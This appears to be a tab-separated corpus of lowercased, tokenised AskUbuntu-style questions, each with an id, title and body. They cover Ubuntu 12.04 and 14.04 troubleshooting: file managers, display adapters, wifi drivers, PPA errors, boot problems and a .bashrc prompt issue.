483417	how to completely change file manager in xubuntu 14.04 ?	i 've been trying to get nautilus to run everything file related in my xubuntu ... without sucess . i got it right up to the desktop . my desktop is completely empty and clicking on it does nothing , there 's no icons , nothing , however , thru the menu , when i open nautilus and go to the desktop thru it , everything 's there . what i 'm trying to say is , i want xubuntu coz ubuntu is n't as fast as xubuntu in this old computer , but i do n't want thunar at all , i want nautilus handling everything , and during the tries to get it to do so , i finally damaged my desktop and ca n't get it working again . what i did was : installed nautilus , removed thunar , in settings > sessions changed xfcdesktop autostarting to never ( do n't know how to set it back ) , tried making nautilus autostart with 'nautilus -n ' . and here i am , everything works , but i have no desktop . thx in advance !
483419	usb to dvi adapter does n't work on ubuntu 12.04 lts	i tried to connect a second monitor to my hp pc so i bought a usb to dvi adapter from ebay last week . the model is this one http : //www.ebay.com.au/itm/usb-2-0-t ... 2d737f4 & _uhb=1 i am using hp pavilion 23 core i5 http : //h20565.www2.hp.com/portal/sit ... 4892.492883150 i tried to follow this post http : //how-to.cc/get-a-displaylink-v ... h-ubuntu-12-04 whenever i try apt-get installxserver-xorg-video-displaylink i got the message the following packages have unmet dependencies : xserver-xorg-video-displaylink : depends : xorg-video-abi-11 depends : xserver-xorg-core ( > = 2:1.10.99.901 ) then i tried to apt-get install both of them after installing them and reboot . it directly go to terminal mode instead of gui mode . i tried ctrl+alt+f7 but i cant return to gui either . i have to reinstall ubuntu again . i have tried this three times already and still getting the same problem . i guess there is a bug ? is there any other ways to make my usb to dvi adapter work ?
483421	how to create a new folder on list view on nautilus ?	this is a really small problem , although it seems to be like a pretty big design issue . when the folder is full of files , for example , there 's no empty space left to right click on , so how do i create a new folder ? or a new document ? there 's absolutely no space to click . here 's an example : if i right click anywhere , it just opens the file right click menu .
483425	run php ( in console ) with geany	do n't tell me i need a server , because i can manually go to terminal and write `` php filename.php '' and it will run it successfully for me . i just need to know how i can do it from geany . proof : gnome-terminal -e `` php % f '' is what i had in mind , but it does n't work , gives an error . any suggestions ?
483428	why is n't bastille in ubuntu 14.04	bastille is missing from the ubutnu 14.04 universe repository . the main question - what should i do to replace the security provided by bastille ? there must be a reason it was removed so how do i make up for it securely ?
483431	where can i find vgaswitcheroo	i know its dupe and may seem dumb but im a bit noob with linux . basically my problem is that i can not locate the /sys/kernel/debug/vgaswitcheroo/switch folder . ( and therefore ca n't use my hdmi port ) . i tried nomodeset , modeset=1 didnt make a difference . i am using open source drivers . my outputs : lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880m [ mobility radeon hd 4225/4250 ] 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] park [ mobility radeon hd 5430/5450/5470 ] lsmod | grep -i radeon radeon 1402449 4 i2c_algo_bit 13413 3 i915 , radeon , nouveau ttm 83995 2 radeon , nouveau drm_kms_helper 52651 3 i915 , radeon , nouveau drm 296739 8 ttm , i915 , drm_kms_helper , radeon , nouveau dmesg | grep -i switcheroo [ 2.414993 ] vga switcheroo : detected switching method \_sb_.pci0.agp_.vga_.atpx handle [ 3.542056 ] vga_switcheroo : enabled [ 4.594771 ] vga_switcheroo : disabled [ 5.968123 ] hda-intel 0000:02:00.1 : handle vga-switcheroo audio client dmesg | egrep 'radeon|switcheroo' [ 2.414971 ] [ drm ] radeon kernel modesetting enabled . [ 2.414993 ] vga switcheroo : detected switching method \_sb_.pci0.agp_.vga_.atpx handle [ 2.415589 ] radeon 0000:01:05.0 : vram : 320m 0x00000000c0000000 - 0x00000000d3ffffff ( 320m used ) [ 2.415592 ] radeon 0000:01:05.0 : gtt : 512m 0x00000000a0000000 - 0x00000000bfffffff [ 2.434801 ] [ drm ] radeon : 320m of vram memory ready [ 2.434803 ] [ drm ] radeon : 512m of gtt memory ready . [ 2.447936 ] radeon 0000:01:05.0 : wb enabled [ 2.447940 ] radeon 0000:01:05.0 : fence driver on ring 0 use gpu addr 0x00000000a0000c00 and cpu addr 0xffff8801147a3c00 [ 2.447943 ] radeon 0000:01:05.0 : fence driver on ring 3 use gpu addr 0x00000000a0000c0c and cpu addr 0xffff8801147a3c0c [ 2.447962 ] [ drm ] radeon : irq initialized . [ 2.448260 ] radeon 0000:01:05.0 : setting latency timer to 64 [ 2.480510 ] [ drm ] radeon atom dig backlight initialized [ 2.480544 ] [ drm ] radeon : power management initialized [ 3.477379 ] fbcon : radeondrmfb ( fb0 ) is primary device [ 3.541472 ] radeon 0000:01:05.0 : fb0 : radeondrmfb frame buffer device [ 3.541474 ] radeon 0000:01:05.0 : registered panic notifier [ 3.541607 ] [ drm ] initialized radeon 2.34.0 20080528 for 0000:01:05.0 on minor 0 [ 3.541689 ] radeon 0000:02:00.0 : enabling device ( 0000 - > 0003 ) [ 3.542056 ] vga_switcheroo : enabled [ 4.587739 ] radeon 0000:02:00.0 : invalid rom contents [ 4.587774 ] radeon 0000:02:00.0 : invalid rom contents [ 4.587785 ] [ drm : radeon_get_bios ] *error* unable to locate a bios rom [ 4.587788 ] radeon 0000:02:00.0 : fatal error during gpu init [ 4.587792 ] [ drm ] radeon : finishing device . [ 4.594771 ] vga_switcheroo : disabled [ 4.595092 ] radeon : probe of 0000:02:00.0 failed with error -22 [ 5.968123 ] hda-intel 0000:02:00.1 : handle vga-switcheroo audio client i tried and it does n't work on mint either . can you help me out please ? my basic problem is that i cant use my hdmi . if you need any other output or info just say : ) thank you ! update : if i use propriety drivers , my xorg fails to start with segment error .
483432	installation of ns-3	friends , i want to install ns-3 on my system please tell me from the beginning all the commands as well as provide me useful links also . waiting for your favourable reply ... .
483437	ubuntu 14.04 wont recognised android phone	when i connect my htc one m8 phone with android 4 ( kitkat ) , my ubuntu 14.04 does not recognise the phone . there is nothing on nautilus to show that it knows its there . the phone will charge but there is no recognition at all . i have a dual boot on my acer laptop and windows 7 recognises my phone and i can read , write copy paste all files so its not a hardware issue . does someone have a solution ? thanks
483438	how do i repair steam ?	after i turned down my computer and came back , steam suddenly needed to update , and the games are gone . i thought the paths to the actual files are gone , as the amount of space that the games take up my partition are still there , as shown by gparted . so , i decided to reinstall steam , which would only affect the launcher and leave the games right where they are . but now , i have this issue . enter code heredpkg : error processing package steam ( -- configure ) : package steam is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : steam e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i fix this problem ?
483439	how to do mythttv database restore	i switched on my myth box today to find that there were no recordings listed.possibly this may be related to an optimize db cron job that was scheduled last night , but i can not be sure of that . i tried to restore a database back up from yesterday , but when i try mythconverg_restore.pl command i get command not found messages . mythconverg_restore.pl is present in that directory . i have tried this from the ~ $ prompt and from the /usr/share/mythtv $ prompt . is there any other way i can do a db restore ?
483441	how to install bsd ethernet driver in linux ?	i 'm running ubuntu 14.04 on an old dell dimension 4600 that 's like 15 years old . i got it for free and it came with an ethernet card that is n't working with the e100 module that arrived with ubuntu by default . card is intel corporation 82562ez 10/100 ethernet controller ( rev 02 ) another user pointed me to this page for the fxp ethernet driver that covers various intel ethernet adapters , that includes these installation instructions : to compile this driver into the kernel , place the following lines in your kernel configuration file : device miibus device fxp alternatively , to load the driver as a module at boot time , place the following line in loader.conf ( 5 ) : if_fxp_load= '' yes '' first , it is my understanding that bsd 's kernel config file is different than linux 's kconfig file , so i am not sure about adding those lines to the /usr/src/linux-headers-3.13.0-24/kconfig file that i have . as for the second option suggested , $ sudo modprobe fxp returns # fatal : module fxp not found . so i think i need to do something with the if_fxp.4freebsd file that i downloaded from that ubuntu manuals page before i can load the fxp module , but i do n't know what .
483445	wireless dropping out using intel 7260ac card ( deauthenticated - reason 7 )	i have recently bought a new laptop and it has an intel 7260ac wireless card in it . i am getting regular wireless dropouts occurring at no specific interval . afaik this only occurs at my house . things i have tried update to the newest mainline kernel ( 3.15 ) update to the new drivers on the intel website ( copied the iwlwifi-7260-8.ucode into /lib/firmware and rebooted ) . turned off power management switched home wireless to wep i 'm at a loss for things to do . this is absolutely crippling at home . here 's some outputs of various logs dmesg [ 8537.229038 ] wlan0 : associated [ 8717.623176 ] wlan0 : deauthenticated from 00:14 : bf : eb:1e:8a ( reason:7=class3_frame_from_nonassoc_sta ) [ 8717.640886 ] cfg80211 : calling crda to update world regulatory domain [ 8717.644652 ] cfg80211 : world regulatory domain updated : [ 8717.644657 ] cfg80211 : dfs master region : unset [ 8717.644659 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) , ( dfs_cac_time ) [ 8717.644661 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) [ 8717.644663 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) [ 8717.644664 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) [ 8717.644665 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) [ 8717.644667 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) [ 8717.683218 ] wlan0 : authenticate with 00:14 : bf : eb:1e:8a [ 8717.689440 ] wlan0 : send auth to 00:14 : bf : eb:1e:8a ( try 1/3 ) [ 8717.691624 ] wlan0 : authenticated [ 8717.692710 ] wlan0 : associate with 00:14 : bf : eb:1e:8a ( try 1/3 ) [ 8717.696209 ] wlan0 : rx assocresp from 00:14 : bf : eb:1e:8a ( capab=0x411 status=0 aid=6 ) [ 8717.699638 ] wlan0 : associated [ 8840.203683 ] wlan0 : deauthenticated from 00:14 : bf : eb:1e:8a ( reason : 7=class3_frame_from_nonassoc_sta ) [ 8840.228674 ] cfg80211 : calling crda to update world regulatory domain [ 8840.230683 ] cfg80211 : world regulatory domain updated : [ 8840.230685 ] cfg80211 : dfs master region : unset [ 8840.230687 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) , ( dfs_cac_time ) [ 8840.230689 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) [ 8840.230690 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) [ 8840.230691 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) [ 8840.230693 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) [ 8840.230694 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) , ( n/a ) lshw -c network *-network description : ethernet interface product : ethernet connection i218-v vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : 28 : d2:44:80:9a:25 capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.3.2-k firmware=0.6-3 latency=0 link=no multicast=yes port=twisted pair resources : irq:64 memory : f0600000-f061ffff memory : f063e000-f063efff ioport:3080 ( size=32 ) *-network description : wireless interface product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 83 serial : 7c:7a:91 : f2:1e:30 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.15.0-031500-generic firmware=22.15.8.0 ip=10.10.10.107 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:62 memory : f0400000-f0401fff uname -a 3.15.0-031500-generic # 201406081435 smp sun jun 8 18:36:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux iw reg get country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ls /lib/firmware | grep iwlwifi iwlwifi-1000-5.ucode iwlwifi-100-5.ucode iwlwifi-105-6.ucode iwlwifi-135-6.ucode iwlwifi-2000-6.ucode iwlwifi-2030-6.ucode iwlwifi-3160-7.ucode iwlwifi-3160-8.ucode iwlwifi-3945-2.ucode iwlwifi-4965-2.ucode iwlwifi-5000-5.ucode iwlwifi-5150-2.ucode iwlwifi-6000-4.ucode iwlwifi-6000g2a-5.ucode iwlwifi-6000g2a-6.ucode iwlwifi-6000g2b-6.ucode iwlwifi-6050-5.ucode iwlwifi-7260-7.ucode iwlwifi-7260-8.ucode is it possible `` iwlwifi-7260-7.ucode '' is conflicting with `` iwlwifi-7260-8.ucode '' ? should i remove it ? what else could be wrong ? i just cant believe that its my router if my brand new laptop is the only device in the house affected by this .
483446	network printer problem	this may sound like a silly question from a newbie , but is their a way to add a network printer to my zubuntu 14.04 that i just downloaded ? i ca n't seem to find where to add it yet .
483447	did n't authorize wine install correctly , now have ttf-mscorefonts-installer issues	i was trying to install wine , and i did n't know how to correctly click ok on the licence window that came out , and i ended up 'x'ing out of it . now i 'm stuck in the ttf-mscorefonts-installer fault . my software centre just crashes as soon as i open it . i keep getting the `` e : the package ttf-mscorefonts-installer needs to be reinstalled , but i ca n't find an archive for it . '' error . i ca n't seem to purge it , or reinstall it . lots of threads of this subject , but nothing seemed to help , so i thought i 'd try my own thread .
483448	how to install printer epson lx 310 in ubuntu 12.04	what is compatible printer driver on epson lx 310 on ubuntu 12.04
483449	run program as root without using sudo	can someone help me to run a `` .run '' on ubuntu 12.04 lts . my problem is i want to execute this program as super-user , but i do n't want to use sudo to run it . i just want to run with `` ./nvidiatvout.run '' , but the system says : `` operation not permitted '' . it can appear easy , but i have searched a lot and i do n't know what to do . best regards ,
483455	error while resizing partition before installation of ubuntu . how can i get my data back ?	it was a ~22 gbytes first windows partition ( with loader ) . i wanted to split it on 2 : 13 gb and 9 gb . in the middle of process was an error with something similar to `` unable to write data on media ( on disk ? ) '' . after this i got 2 partitions : windows ntfs partition with remark : ( used space unknown ) . unused space this is what it looks like now : at this point i 've stopped everything and came here . ( it seems that windows can not start . but i did n't try too much . i ca n't be sure that all my files were successfully transferred to the resized partition . ) when i am trying to mount partition from ubuntu it says : error mounting /dev/sda1 at /media/ubuntu/ce00475c00474aa3 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/ubuntu/ce00475c00474aa3 '' ' exited with non-zero exit status 13 : failed to load runlist for $ mft/ $ data . highest_vcn = 0x607c , last_vcn - 1 = 0xa2bf failed to load $ mft : input/output error failed to mount '/dev/sda1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . now i am using internet from live-dvd . and it is a real pain , because it takes ~20 minutes to boot from live-dvd . ( i do n't know why ) what should i do now ? http : //www.reddit.com/r/ubuntu/comments/286ikp/error_while_resizing_partition_before/
483456	can not add repository ppa : pipelight/stable	i 'm trying to get netflix setup on my computer , but when i type in the first command everyone says i need to do , this is what happens : emile @ mancave : ~ $ sudo apt-add-repository ppa : pipelight/stable can not add ppa : 'ppa : pipelight/stable ' . please check that the ppa name or format is correct . any ideas on why that would be coming up ?
483462	ffmpeg file format library update blocked	i have an update for ffmpeg file format library and that update is blocked . i have done several searches to find out why it is blocked but come up with nothing on it . it is there listed as a blocked update . can someone help me unblock or get rid of it ?
483464	create a file with root access and make it executable ?	i am having issues with docky app and found this one and only solution online that could probably help . http : //www.linux-compatible.com/tutorial/docky-closes-after-waking-suspend-ubuntu it also has a video https : //www.youtube.com/watch ? v=sab2i-q6npc i am new to ubuntu , the instructions provided are very much unclear to me . the video does n't help as well . i just need a simple instructions on what to click and how . thanks in advance !
483465	package is of bad quality error when installing lexmark printer utility downloaded from lexmark website	i 'm using ubuntu 14.04 getting a package is of bad quality error the printer utility is for lexmark prospect se pro208 the package is of bad quality the installation of a package which violates the quality standards is n't allowed . this could cause serious problems on your computer . please contact the person or organization who provided this package file and include the details beneath . details lintian check results for /home/sks/downloads/lexmark-printer-utility-1.0-2.amd64 ( 2 ) .deb : e : lexmark-printer-utility : control-file-has-bad-owner postinst root/bin ! = root/root e : lexmark-printer-utility : control-file-has-bad-owner prerm root/bin ! = root/root i 'm presented with an option to ignore and install . should i install this ? would it break anything ? thanks
483467	how can i fix the add-apt-repository hang ?	i 'm not sure what happened , but add-apt-repository does n't work anymore . if i try , it just hangs : after '' [ sudo ] password for cyanogenhacker : '' and entering the password , it just flashes the cursor and does nothing for about thirty seconds . afterwards it states '' please check that the ppa name or format is correct . '' despite having copied and pasted and verifying multiple times that the text is correct . it happens with every ppa i try ( docky , numix , noobslab/themes ) any help ? ?
483468	dtv receiver driver	i have an usb digital tv receiver , named coradir dtv-1000 ( bought in argentina ) . it works fine on windows . how may i make it work on ubuntu 14.04 ? lsusb output is : bus 001 device 003 : id 695c:1305 opera1 and usb-devices output is : t : bus=01 lev=02 prnt=02 port=01 cnt=01 dev # = 3 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=695c prodid=1305 rev=01.00 s : manufacturer=12345678 s : product=dm1305ghijklmnop s : serialnumber=abcd1234d456dm1305 c : # ifs= 1 cfg # = 1 atr=80 mxpwr=100ma i : if # = 0 alt= 0 # eps= 3 cls=ff ( vend . ) sub=ff prot=50 driver= ( none ) kaffeine shows no tv devices .
483469	windows 7/ubuntu dual boot help ?	i installed ubuntu and was running it for a month before i wanted windows back to run some programs that i could n't run on ubuntu . i had accidentally deleted my recovery partition and overwrote windows when i installed ubuntu . i eventually got windows 7 back on my computer but now i do n't know how to boot up ubuntu again . i still have ubuntu on a bootable partition and windows is on it 's on bootable partition . can anyone tell me how i can boot up ubuntu again ? thanks : )
483471	where can i find a log or see the progress of importing images in maas ?	it seems like you tell it to import boot images and then just wait blind for a few hours . where can you find a log of what it is doing , or get the current progress ( and if it has errors and quits , see why it quits ) ?
483472	after uninstalling ubuntu 12.04 , , grub rescue is loading . not able to go into bios settings	i had a dual booting system with win 8 and ubuntu 12.04 . i deleted ubuntu using windows disk management , created a win 8 recovery usb disk to repair mbr and rebooted . the system went into grub rescue . i am not able to go into bios at all ( pressing f2 no response ) .can somebody help me out
483474	no init found try , passing init=bootarg	i get the error no init found try passing init=bootarg like a lot of people , but when i try to run this from a live cd : sudo fsck-y /dev/sda1 all i get is fsck from util-linux 2.20.1 e2fsck 1.42.9 ( 4-feb-2014 ) /dev/sda1 is mounted . e2fsck : can not continue , aborting . when i click on 636 gb volume on the desktop i can view all of my files and documents , but upon clicking on ubuntu-studio 14.04 lts amd64 the reply i get is error mounting /dev/sdb1 at /media/ubuntu-studio/ubuntu-studio 14.04 lts amd64 : command-line `mount -t `` iso9660 '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , iocharset=utf8 , mode=0400 , dmode=0500 '' `` /dev/sdb1 '' `` /media/ubuntu-studio/ubuntu-studio 14.04 lts amd64 '' ' exited with non-zero exit status 32 : mount : block device /dev/sdb1 is write-protected , mounting read-only mount : /dev/sdb1 already mounted or /media/ubuntu-studio/ubuntu-studio 14.04 lts amd64 busy .
483476	burg installation	i 've been reading about the burg bootloader as a replacement for grub2 . if i install burg , will it overwrite grub and all of its settings ? how will things work , and how do i install themes ?
483477	no such file or directory error on dd commands	i 'm trying to run dd commands to fix a cell phone issue in ubuntu 14.04 . i 'm running ubuntu from a dvd side-by-side with windows 8 on a 64 bit machine and have automount disabled . for example when i try to run dd if=home/name/desktop/sbl1.img of=/dev/sdb2 i get the error message `` dd : failed to open ( location ) : no such file or directory '' but the file is indeed in that location . i have tried using both name @ ubuntu : ~ $ and root @ ubuntu : ~ # same result both ways . `` name '' is an administrator account . any ideas on what the issue is ?
483478	no sound after xubuntu-desktop installation	i had , initially , a ubuntu installation running completely fine . compiz bugged , then i switched to lxqt . lxqt bugged between sessions , then i switched to kde . kde bugged on some applications , then i switched to xfce ( at the moment ) . sound worked fine between all those transitions up until now . when i finally installed and rebooted my pc , sound was gone . i 'm running ubuntu 14.04 x64 on the xfce enviroment . switching to another session/enviroment does n't work . what i 've done already : reinstall alsa and pulseaudio ( purging ) add a string line at the end of alsa.conf check if my audio drivers are being detected try unmuting sound values on the xfce4-mixer purging pulseaudio and trying to work with only alsa general information i found on the similar topics did n't work either tweaking values on alsamixer any help would be appreciated . as i said , problem started when i installed xubuntu . i was told to remove xfce4-mixer but i had to uninstall the xfce4 package along it , should i proceed ? edit : some sses and pastebin/ryuudper , pastebin/e6klyf5d some screenshots :
483479	issue adding ppa 's	when i run the command sudo add-apt-repository ppa : linrunner/tlp it hangs after it asks for my password for a long time then shows this can not add ppa : 'ppa : linrunner/tlp ' . please check that the ppa name or format is correct . i know the format is correct , i do n't know what is wrong . i am not behind a proxy or any other internet blocking firewalls .
483480	check if all dep packages dependencies are satisfied	i sometimes install .deb files that have a `` provides '' field . from what i understand , if e.g . a package called `` expack '' is listed here then if another .deb file depends on expack it will not need to install it ( if i do apt-get ) . but if i do apt-cache show expack then it will not show that it 's installed . so how do i check that the 'expack ' dependency is installed ( without using a specific package that depends on 'expack ' , just using only the argument 'expack ' ) ?
483495	dell inspiron mini post-upgrade problems	i 'm no master of linux systems but i 'm fairly adept . however , i am at the end of my logic with this one . on saturday june 14th , i updated the ubuntu os on my dell inspiron mini laptop to the most current version ( 14 , i believe ) and once i turned the computer back on the mouse will not move and most of the icons on the sidebar are gone , including internet . before i updated it , there were also about 596 updates to install too . this being my mother 's computer , she never installed them . so i 'm not sure if all of those updates overwhelmed the computer or if the latest update was messed up somehow . i would appreciate any help and please use lamens terms , since i 'm no master of linux os .
483496	ubuntu booting with kde problem	i have deleted kde from my ubuntu 14.04 . but now when i restart the system its trying to bring-up the display with kde and as there is no kde available i am getting a black screen . is there any way to boot with default gnome or in recovery mode. ? i am unable to see anything , so ca n't change anything graphically . i am able to login in tty1 . i have used the below command to install and uninstall the kde desktop : install : sudo apt-get install kubuntu-desktop uninstall : sudo aptitude remove kubuntu-desktop
483497	paste image resulted from ctrl+shift+printscreen	when i try paste image resulted from ctrl+shift+printscreen to freemind it do n't paste any thing . but when i try paste it in libreoffice it work properly . please help me
483502	how do i prevent xubuntu 14.04 from turning off when listening to music ?	i do n't want settings turned to never . i also tried the caffeine app but could n't even get it to start , and so here i am . thanks in advance !
483503	wifi not working with lubuntu 14.04	i just switched to lubuntu 14.04 ( was using ubuntu 11.10 before ) and i could not get my wifi to work . i am using bcm4312 lp-phy . i did the usual steps of removing the blacklist from blacklist.conf , and then installing the b43 firmware packages through synaptics . i also tried command line : sudo apt-get install firmware-b43-installer after all this , it can detect wireless networks and the wireless light on my laptop comes on . if i do ifconfig i see that the wireless seems to be detected . wlan0 link encap : ethernet hwaddr 00:21:00:6f:1f:41 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) however , when i try to connect to my wireless network , it says that the connection has limited or no connectivity . please help . i am a big fan of ubuntu but i have not spent several hours on this with no luck . gaurav
483506	pipelight not installing	i really want to watch netflix on ubuntu , but i ca n't because netflix has no support for it . i googled how to watch netflix on ubuntu , and it said something about installing pipelight . i tried and followed all the instructions , but it just wouldnt install . every time i type in the install command , this happens : waylon @ waylon-lenovo-g770 : ~ $ sudo add-apt-repository ppa : pipelight/stable can not add ppa : 'ppa : pipelight/stable ' . please check that the ppa name or format is correct . one time i tried it , it showed this : waylon @ waylon-lenovo-g770 : ~ $ sudo add-apt-repository ppa : pipelight/stable more info : https : //launchpad.net/~pipelight/+archive/stable press [ enter ] to continue or ctrl-c to cancel adding it error reading https : //launchpad.net/api/1.0/~pipelight/+archive/stable : service temporarily unavailable but that has only happened once , and it still ended in failure . i tried many solutions and fixes , but those failed too . help ! ! i use ubuntu 14.04 thanks , waylon
483512	slow boot after 14.04 upgrade	please help - boot slowed down from around 10 seconds to about 45 seconds after my upgrade to 14.04 . laptop is a lenovo w530 with an ssd and overall is very fast . here is dmesg - http : //pastebin.com/vyx8qvac here is my boot chart - http : //picpaste.com/pics/tal-thinkpad-w530-trusty-20140614-1.1402815981.png please help ? hints ?
483513	how to resolve conflict dependencies ubuntu server 12.04 with apache2.4 ?	i can not install apache2.4 . requires dependency . result : apt-get install apache2 apt-get install apache2-bin
483514	bengali avro keyboard not working in lubuntu 14.04	i have installed avro successfully in lubuntu 14.04 . the only problem i am facing currently is that whenever i switch to bengali-avro phonetic and try to write something , i can see the suggestions in bengali but no text is entered in the main text field . i am trying to write in these softwares : leafpad , libreoffice , firefox , chrome . hope that i might get an answer this time . thanks in advance .
483515	how to make a debian package from ubuntu sdk ?	i have created an app using the ubuntu sdk and now i ca n't find a way to package it . the documentation says the easiest way to do so is using the publish button located on the left bar in ubuntu sdk , but in my case it is greyed out . what should i do ?
483516	need to exec $ shell on new terminal for settings to work	unsure what is interfering with my shell , on every new shell i need to exec $ shell to get correct settings to take . i am getting this prompt by default sayth @ sayth-travelmate-5740g : ~ $ and after exec $ shell and its working sayth @ sayth-travelmate-5740g : ~ $ exec $ shell sayth : ~ $ this is my .bashrc # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything case $ - in *i* ) ; ; * ) return ; ; esac # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ { debian_chroot : - } '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if ! shopt -oq posix ; then if [ -f /usr/share/bash-completion/bash_completion ] ; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ] ; then . /etc/bash_completion fi fi # pip bash completion start _pip_completion ( ) { compreply= ( $ ( comp_words= '' $ { comp_words [ * ] } '' \ comp_cword= $ comp_cword \ pip_auto_complete=1 $ 1 ) ) } complete -o default -f _pip_completion pip # pip bash completion end the pip completion section i have commented out and restarted 